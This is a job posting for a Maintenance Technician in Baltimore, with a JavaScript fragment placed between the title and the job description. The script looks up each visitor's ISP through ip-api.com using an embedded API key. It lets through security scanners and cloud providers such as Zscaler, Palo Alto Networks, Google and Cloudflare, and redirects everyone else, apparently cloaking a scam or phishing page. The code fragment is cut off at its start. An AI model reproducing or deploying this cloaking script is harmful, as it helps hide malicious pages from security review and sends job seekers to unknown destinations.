Maintenance Technician
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
We are seeking a dedicated Maintenance Technician to join our team in Baltimore, MD.
Responsibilities include:
- Perform routine maintenance and inspections on equipment and facilities to ensure optimal operation.
- Diagnose and repair electrical, plumbing, HVAC, and mechanical systems.
- Respond promptly to maintenance requests and resolve issues efficiently.
- Maintain accurate records of maintenance activities and work performed.
- Ensure compliance with safety standards and company policies.
Skills needed:
- Strong troubleshooting and problem-solving abilities.
- Knowledge of electrical, plumbing, HVAC, and mechanical systems.
- Ability to read technical manuals and schematics.
- Excellent communication and teamwork skills.
- Commitment to safety and quality workmanship.
Benefits include competitive pay, health insurance, paid time off, and opportunities for career growth. Join us to maintain a safe, efficient, and well-maintained facility in Baltimore!